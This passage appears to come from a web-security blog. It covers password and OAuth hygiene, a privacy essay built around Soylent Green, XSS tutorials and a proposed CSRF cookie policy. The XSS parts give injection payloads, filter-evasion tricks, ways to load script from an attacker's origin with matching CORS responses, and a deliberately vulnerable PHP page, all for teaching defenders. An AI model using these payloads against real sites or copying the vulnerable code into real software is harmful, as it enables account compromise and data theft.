If the site relies on security questions, consider creating unique answers for each site. This means you’ll have to remember dozens of question/response pairs. Make sure to encrypt this list with something like the OS X Keychain.

Review Your OAuth Grants

For sites you use as OAuth providers (like Facebook, Twitter, Linkedin, Google+, etc.), review the third-party apps to which you’ve granted access. You should recognize the sites that you’ve just gone through a password refresh for. Delete all the others.

Where possible, reduce permissions to a minimum. You’re relying on this for authentication, not information leakage.


Use HTTPS

Universal adoption of HTTPS remains elusive. Fortunately, sites like Facebook and Twitter have enabled it by default. If a site has an option to force HTTPS, use it. After all, if you’re going to rely on these sites for OAuth, then the security of those accounts becomes paramount.

Maintain Constant Vigilance

Keep your browser secure. Keep your system up to date. Set a reminder to go through this all over again a year from now — if not earlier.

Otherwise, you risk losing more than one account should your password be exposed among the millions. You are not a number, you’re a human being.

Soylent Grün ist Menschenfleisch

Silicon Valley green is made of people. This is succinctly captured in the phrase: When you don’t pay for the product, the product is you. It explains how companies attain multi-billion dollar valuations despite offering their services for free. They promise revenue through the glorification of advertising.

Investors argue that high valuations reflect a company’s potential for growth. That growth comes from attracting new users. Those users in turn become targets for advertising. And sites, once bastions of clean design, become concoctions of user-generated content, ad banners, and sponsored features.

Population Growth

Sites measure their popularity by a single serving size: the user. Therefore, one way to interpret a company’s valuation is in its price per user. That is, how many calories can a site gain from a single serving? How many servings must it consume to become a hulking giant of the web?

Dystopian Books

You know where this is going.

The movie Soylent Green presented a future where a corporation provided seemingly beneficent services to a hungry world. It wasn’t the only story with themes of overpopulation and environmental catastrophe to emerge from the late ’60s and early ’70s. The movie was based on the novel Make Room! Make Room!, by Harry Harrison. And it had peers in John Brunner’s Stand on Zanzibar (and The Sheep Look Up) and Ursula K. Le Guin’s The Lathe of Heaven. These imagined worlds contained people powerful and poor. And they all had to feed.

A Furniture Arrangement

To sell is to feed. To feed is to buy.

In Soylent Green, Detective Thorn (Charlton Heston) visits an apartment to investigate the murder of a corporation’s board member, i.e. someone rich. He is unsurprised to encounter a woman there and, already knowing the answer, asks if she’s “the furniture.” It’s trivial to decipher this insinuation about a woman’s role in a world afflicted by overpopulation, famine, and disparate wealth. That an observation made in a movie forty years ago about a future ten years hence rings true today is distressing.

We are becoming products of web sites as we become targets for ads. But we are also becoming parts of those ads. Becoming furnishings for fancy apartments in a dystopian New York.

Women have been components of advertising for ages, selected as images relevant to manipulating a buyer no matter the irrelevance of their image to the product. That’s not changing. What is changing is some sites’ desire to turn all users into billboards. They want to create endorsements by you that target your friends. Your friends are as much a commodity as your information.

In this quest to build advertising revenue, sites also distill millions of users’ activity into individual recommendations of what they might want to buy or predictions of what they might be searching for.

And what a sludge that distillation produces.

There may be the occasional welcome discovery from a targeted ad, but there is also an unwelcome consequence of placing too much faith in algorithms. A few suggestions can become dominant viewpoints based more on others’ voices than personal preferences. More data does not always mean more accurate data.

We should not excuse algorithms as impartial oracles of society. They are tuned, after all. And those adjustments may reflect the bias and beliefs of the adjusters. For example, an ad campaign created for UN Women employed a simple premise: superimpose upon pictures of women a search engine’s autocomplete suggestions for phrases related to women. The result exposes biases reinforced by the louder voices of technology. More generally, a site can grow or die based on a search engine’s ranking. An algorithm collects data through a lens. It’s as important to know where the lens is not focused as where it is.

There is a point where information-for-services is no longer a fair trade: where apps collect the maximum information to offer the minimum functionality. There should be more of a push in the other direction, toward apps that request the minimum information needed to deliver the maximum functionality.

Going Home

In the movie, Sol (Edward G. Robinson) talks about going Home after a long life. Throughout the movie, Home is alluded to as the ultimate, welcoming destination. It’s a place of peace and respect. Home is where Sol reveals to Detective Thorn the infamous ingredient of Soylent Green.

Web sites want to be your home on the web. You’ll find them exhorting you to make their URL your browser’s homepage.

Home Page

Web sites want your attention. They trade free services for personal information. At the very least, they want to sell your eyeballs. We’ve seen aggressive escalation of this in various privacy grabs, contact list pilfering, and weak apologies that “mistakes were made.”

More web sites and mobile apps are releasing features outright described as “creepy but cool” in the hope that the latter outweighs the former in a user’s mind. Services shouldn’t be expected to be free of any form of compensation; the Web doesn’t have to be uniformly altruistic. But there’s growing suspicion that personal information and privacy are being undervalued and under-protected by the sites offering those services. There should be a balance between what a site offers its users and how much information it collects about them (and how long it keeps that information).

The Do Not Track effort fizzled, hobbled by indecision over its default setting. Browser makers have long encouraged default settings that favor stronger security, but they seem to have less consensus about what default privacy settings should be.

Third-party cookies will be devoured by progress; they are losing traction within the browser and mobile apps. Safari has long blocked them by default. Chrome has not. Mozilla has considered it. Their descendants may be cookie-less tracking mechanisms, which the web titans are already investigating. This isn’t necessarily a bad thing. Done well, a tracking mechanism can be limited to an app’s sandboxed perspective as opposed to full view of a device. Such a restriction can limit the correlation of a user’s activity, thereby tipping the balance back towards privacy.

If you rely on advertising to feed your company and you do not control the browser, you risk going hungry. For example, only Chrome embeds the Flash plugin. A plugin that eternally produces vulnerabilities while coincidentally playing videos for a revenue-generating site.

Lightbeam Example

There are few means to make the browser an agent that prioritizes a user’s desires over a site’s. The Ghostery plugin is an active counteraction to tracking; it’s available for all the major browsers. Mozilla’s Lightbeam does not block tracking mechanisms by default; it reveals how interconnected tracking has become due to ubiquitous cookies.

Browsers are becoming more secure, but they need a site’s cooperation to protect personal information. At the very least, sites should be using HTTPS to protect traffic as it flows from browser to server. To do so is laudable yet insufficient for protecting data. And even this positive step moves slowly. Privacy on mobile devices moves perhaps even more slowly. The recent iOS 7 finally forbids apps from accessing a device’s unique identifier, while Android struggles to offer comprehensive tools.

The browser is Home. Apps are Home. These are places where processing takes on new connotations. This is where our data becomes their food.

Soylent Green’s year 2022 approaches. Humanity must know.

Selector the Almighty, Subjugator of Elements

Initial D: The Fool with Two Demons

An ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform <input value="abc"> into <input value="abc"><script>alert(9)</script><"">.

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.
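The litany itself is short. A minimal sketch of the HTML-encoding step (percent encoding is its URL-context sibling), shown here in JavaScript for illustration:

```javascript
// Encode the five HTML metacharacters so data stays data,
// regardless of where an attacker tries to break out of context.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

console.log(htmlEncode('"><script>alert(9)</script>'));
// → &quot;&gt;&lt;script&gt;alert(9)&lt;/script&gt;
```

The payload arrives intact, but the browser renders it as inert text instead of parsing it as markup.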

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:


Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

$(document).ready(function() {
    $("#page-hdr h3").css("width","385px");
    $("#main-panel").addClass("search-wdth938");
});

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.


We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

$(document).ready(function() {
    $("#page-hdr h3").css("width","385px");
    $("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938"); });

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by its true name it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, so why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns, especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties. jQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit; this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)


As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source
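Pasted into a console, the trick assembles the tag without a single literal angle bracket appearing as markup in the payload (pure JavaScript, no DOM needed):

```javascript
// RegExp literals smuggle the angle brackets past a character filter;
// .source recovers them as plain string data.
const tag = /</.source + "img" + />/.source;
console.log(tag); // → <img>
```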

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. In the next example we use the Selector to obtain a collection of elements, then iterate through the collection with the .each() function. Since we specify a :first selector, the collection should only have one entry.

$("img:first").each(function(k,o){o.src="x";o.onerror=function(){alert(9);};})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:


We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.


I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php $s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth'; ?>
<!doctype html>
<html>
<head><meta charset="utf-8">
<!-- jQuery Selector Injection Demo -->
<script src=""></script>
<script> $(document).ready(function(){ $("#main-panel").addClass("<?php print $s;?>"); }) </script>
</head>
<body>
  <div id="main-panel"> <a href="#" id="link1" class="foo">a link</a> <br>
    <input type="hidden" id="csrf" name="_csrfToken" value="123">
    <input type="text" name="q" value=""><br> <input type="submit" value="Search">
    <img id="footer" src="" alt="">
  </div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode misled developers about what was really being made “safe”, and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers – prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.


But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var , int $base = 10 )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable on the platform. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear – at least, they should.
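PHP isn’t alone in this fix-up behavior. JavaScript’s parseInt() performs the same silent truncation, which makes it a handy way to see the hazard from any browser console:

```javascript
// parseInt mirrors PHP's intval(): leading digits win, trailing junk vanishes.
console.log(parseInt("19", 10));    // 19
console.log(parseInt("19abc", 10)); // 19 -- the "abc" is silently discarded
console.log(parseInt("abc", 10));   // NaN (PHP's intval() returns 0 instead)
```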

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln – and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<meta charset="utf-8">
<input type="text" name="s" value="<?php print $val;?>"><br>
<input type="submit">

At first glance, a developer might assume this to be safe from HTML injection, especially if they test the code with a simple payload:

"><script>alert(9)</script>

As a consequence of the non-numeric payload, intval() has nothing to cast to an integer, so the greater-than-zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try a payload that leads with a number instead:

19"><script>alert(9)</script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following query string turns the s parameter into an array:

?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

?s[0]=19&s[1]=42
?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

?s[-1]=19

Or we can create an array with named keys:

?s["a"]=19
?s["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output, it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.
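In regex terms, inspecting the entirety of a value is the difference between asking “does this contain digits?” and “is this only digits?”:

```javascript
const loose = /\d+/;    // digits anywhere -- a substring match
const strict = /^\d+$/; // digits only -- anchored to the whole value

const payload = '19"><script>alert(9)</script>';
console.log(loose.test(payload));  // true  -- the unanchored filter is satisfied
console.log(strict.test(payload)); // false -- the anchored filter rejects it
```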

Third, decide on a consistent policy for dealing with invalid data. intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0, respectively. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks – it misses a payload like “<scrscriptipt>”.
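The “scrscriptipt” trick deserves a demonstration. A single-pass strip of the word “script” reassembles the very payload it meant to destroy:

```javascript
// A fix-up filter that deletes each occurrence of "script" -- once.
function stripScript(s) {
  return s.replace(/script/gi, "");
}

// Removing the inner "script" from "scrscriptipt" leaves "script".
console.log(stripScript("<scrscriptipt>alert(9)</scrscriptipt>"));
// → <script>alert(9)</script>
```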

DRY Fiend (Conjuration/Summoning)

Thief PHB

In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how Humphrey, Duke of Gloucester, defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,
Or foul felonious thief that fleec’d poor passengers,
I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Well, hackers code, too.

The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

  1. Avoid incompetent deny lists (which is really a redundant term).
  2. Leverage code that already exists.

Keep in mind that none of the following hacks are flaws of each respective JavaScript library. The target is assumed to have an HTML injection vulnerability – our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

angular.bind(self, alert, 9)()

In Ember.js the payload might look like:

Ember.run(window, alert, 9)

The pervasive jQuery might have a string like:


And the Underscore library might be leveraged with:

_.defer(alert, 9)

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

More importantly, these libraries provide the means to load – and execute! – JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

$.get('//')
$('#selector').load('//')

Prototype has an Ajax object. It will load and execute code from a call like:

new Ajax.Request('//')

But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link on the attacker’s origin:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0

As someone with influence over the content served by the attacker’s origin, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
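Server-side, granting the pre-flight takes only a few lines. A hypothetical sketch of the header-building logic (the function name, shape, and domain are mine, not from any framework):

```javascript
// Build a permissive pre-flight reply: echo back whatever origin and
// custom headers the browser asked about, and allow GET/POST.
function corsPreflightReply(requestHeaders) {
  return {
    'Access-Control-Allow-Origin': requestHeaders['origin'] || '*',
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers':
      requestHeaders['access-control-request-headers'] || '',
  };
}

const reply = corsPreflightReply({
  'origin': 'https://attacker.invalid', // placeholder origin
  'access-control-request-headers': 'x-prototype-version,x-requested-with',
});
console.log(reply['Access-Control-Allow-Headers']);
// x-prototype-version,x-requested-with
```

Echoing the browser’s own Access-Control-Request-Headers value back is the laziest possible grant: whatever the victim’s browser asks for, it gets.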

With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8


Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

Find/Remove Traps

It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content. Nevertheless, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% chance to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

...And They Have a Plan

No notes are so disjointed as the ones skulking about my brain as I was preparing slides for last week’s BlackHat presentation. I’ve now wrangled them into a mostly coherent write-up.

This won’t be the last post on this topic. I’ll be doing two things over the next few weeks: throwing a doc into GitHub to track changes/recommendations/etc., responding to more questions, working on a different presentation, and trying to stick to the original plan (i.e. two things). Oh, and getting better at Markdown.

So, turn up some Jimi Hendrix, play some BSG in the background, and read on.

== The Problem ==

Cross-Site Request Forgery (CSRF) abuses the browser’s normal ability to make cross-origin requests: a resource on one origin causes a victim’s browser to make a request to another origin, using the victim’s security context associated with that target origin.

The attacker creates and places a malicious resource on an origin unrelated to the target origin to which the victim’s browser will make a request. The malicious resource contains content that causes a browser to make a request to the unrelated target origin. That request contains parameters selected by the attacker to affect the victim’s security context with regard to the target origin.

The attacker does not need to violate the browser’s Same Origin Policy to generate the cross origin request. Nor does the attack require reading the response from the target origin. The victim’s browser automatically includes cookies associated with the target origin for which the forged request is being made. Thus, the attacker creates an action, the browser requests the action and the target web application performs the action under the context of the cookies it receives – the victim’s security context. An effective CSRF attack means the request modifies the victim’s context with regard to the web application in a way that’s favorable to the attacker. For example, a CSRF attack may change the victim’s password for the web application.

CSRF takes advantage of web applications that fail to enforce strong authorization of actions during a user’s session. The attack relies on the normal, expected behavior of web browsers to make cross-origin requests from resources they load on unrelated origins.

The browser’s Same Origin Policy prevents a resource in one origin from reading the response from an unrelated origin. However, the attack only depends on the forged request being submitted to the target web app under the victim’s security context – it does not depend on receiving or seeing the target app’s response.

== The Proposed Solution ==

SOS is proposed as an additional policy type of Content Security Policy. Its behavior also includes pre-flight checks as used by the Cross-Origin Resource Sharing spec.

SOS isn’t just intended as a catchy acronym. The name is intended to evoke the SOS of Morse code, which is both easy to transmit and easy to understand. If an explanation of what SOS stands for is required, then “Session Origin Security” would be preferred. (However, “Simple Origin Security”, “Some Other Security”, and even “Save Our Site” are acceptable. “Same Old Stuff” is discouraged. More options are left to the reader.)

An SOS policy may be applied to one or more cookies for a web application on a per-cookie or collective basis. The policy controls whether the browser includes those cookies during cross-origin requests. (A cross-origin resource cannot access a cookie from another origin, but it may generate a request that causes the cookie to be included.)

== Format ==

A web application sets a policy by including a Content-Security-Policy response header. This header may accompany the response that includes the Set-Cookie header for the cookie to be covered, or it may be set on a separate resource.

A policy for a single cookie would be set as follows, with cookieName naming the cookie and policy one of the directives 'any', 'self', or 'isolate'. (Those directives will be defined shortly.)

Content-Security-Policy: sos-apply=cookieName 'policy'

A response may include multiple CSP headers, such as:

Content-Security-Policy: sos-apply=cookieOne 'policy'
Content-Security-Policy: sos-apply=cookieTwo 'policy'

A policy may be applied to all cookies by using a wildcard:

Content-Security-Policy: sos-apply=* 'policy'
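Since no browser implements SOS, any parser is hypothetical; still, the directive grammar above is simple enough to sketch:

```javascript
// Hypothetical parser for the sos-apply directive described above.
// "sos-apply=sid 'self'" -> { cookie: 'sid', policy: 'self' }
function parseSosApply(headerValue) {
  const m = headerValue.match(/^sos-apply=(\S+)\s+'(any|self|isolate)'$/);
  return m ? { cookie: m[1], policy: m[2] } : null;
}

console.log(parseSosApply("sos-apply=sid 'any'").policy);   // any
console.log(parseSosApply("sos-apply=* 'isolate'").cookie); // *
console.log(parseSosApply("sos-apply=sid 'bogus'"));        // null
```

An unknown directive parses to null, i.e. it would simply be ignored rather than guessed at.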

== Policies ==

One of three directives may be assigned to a policy. The directives affect the browser’s default handling of cookies for cross-origin requests to a cookie’s destination origin. The pre-flight concept will be described in the next section; it provides a mechanism for making exceptions to a policy on a per-resource basis.

Policies are only invoked for cross-origin requests. Same origin requests are unaffected.

'any' – include the cookie. This represents how browsers currently work. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'self' – do not include the cookie. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'isolate' – never include the cookie. Do not make a pre-flight request to the resource because no exceptions are allowed.

== Pre-Flight ==

A browser that is going to make a cross-origin request that includes a cookie covered by a policy of 'any' or 'self' must make a pre-flight check to the destination resource before conducting the request. (A policy of 'isolate' instructs the browser to never include the cookie during a cross-origin request.)

The purpose of a pre-flight request is to allow the destination origin to modify a policy on a per-resource basis. Thus, certain resources of a web app may allow or deny cookies from cross-origin requests despite the default policy.

The pre-flight request works identically to that for Cross Origin Resource Sharing, with the addition of an Access-Control-SOS header. This header includes a space-delimited list of cookies that the browser might otherwise include for a cross-origin request, as follows:

Access-Control-SOS: cookieOne cookieTwo

A pre-flight request might look like the following; note that the Origin header is expected to be present as well:

Origin: https://other.origin
Access-Control-SOS: sid
Connection: keep-alive
Content-Length: 0

The destination origin may respond with an Access-Control-SOS-Reply header that instructs the browser whether to include the cookie(s). The response will either be 'allow' or 'deny'.

The response header may also include an expiration in seconds. The expiration allows the browser to remember this response and forego subsequent pre-flight checks for the duration of the value.

The following example would allow the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'self'. (In the absence of a reply header, the browser would not include the cookie.)

Access-Control-SOS-Reply: 'allow' expires=600

The following example would forbid the browser from including a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'any'. (In the absence of a reply header, the browser would include the cookie.)

Access-Control-SOS-Reply: 'deny' expires=0
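Taken together, the three directives plus the reply values reduce to a small decision table. A sketch of that logic as I read the proposal (not normative):

```javascript
// Should the browser include a policy-covered cookie on a
// cross-origin request? reply is 'allow', 'deny', or null (no
// Access-Control-SOS-Reply header was received).
function shouldIncludeCookie(policy, reply) {
  if (policy === 'isolate') return false; // never included, no pre-flight
  if (reply === 'allow') return true;     // per-resource exception
  if (reply === 'deny') return false;     // per-resource exception
  return policy === 'any';                // no reply: fall back to default
}

console.log(shouldIncludeCookie('self', 'allow'));    // true
console.log(shouldIncludeCookie('any', 'deny'));      // false
console.log(shouldIncludeCookie('isolate', 'allow')); // false
console.log(shouldIncludeCookie('self', null));       // false
```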

The browser would be expected to track policies and policy exceptions based on destination origins. It would not be expected to track pairs of origins (e.g. different cross-origins to the destination) since such a mapping could easily become cumbersome, inefficient, and more prone to abuse or mistakes.

As described in this section, the pre-flight is an all-or-nothing affair. If multiple cookies are listed in the Access-Control-SOS header, then the response applies to all of them. This might not provide enough flexibility. On the other hand, simplicity tends to encourage security.

== Benefits ==

Note that a policy can be applied on a per-cookie basis. If a policy-covered cookie is disallowed, any non-covered cookies for the destination origin may still be included. Think of a non-covered cookie as an unadorned or “naked” cookie – its behavior, and the browser’s handling of it, matches the web of today.

The intention of a policy is to control cookies associated with a user’s security context for the destination origin. For example, it would be a good idea to apply 'self' to a cookie used for authorization (and identification, depending on how tightly coupled those concepts are by the app’s reliance on the cookie).
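Setting the cookie and its policy can happen in the same response. A hypothetical sketch (the res object mimics a Node-style response; only the header names and directive syntax come from the proposal):

```javascript
// Issue the session cookie and immediately cover it with a 'self'
// SOS policy so cross-origin requests won't carry it by default.
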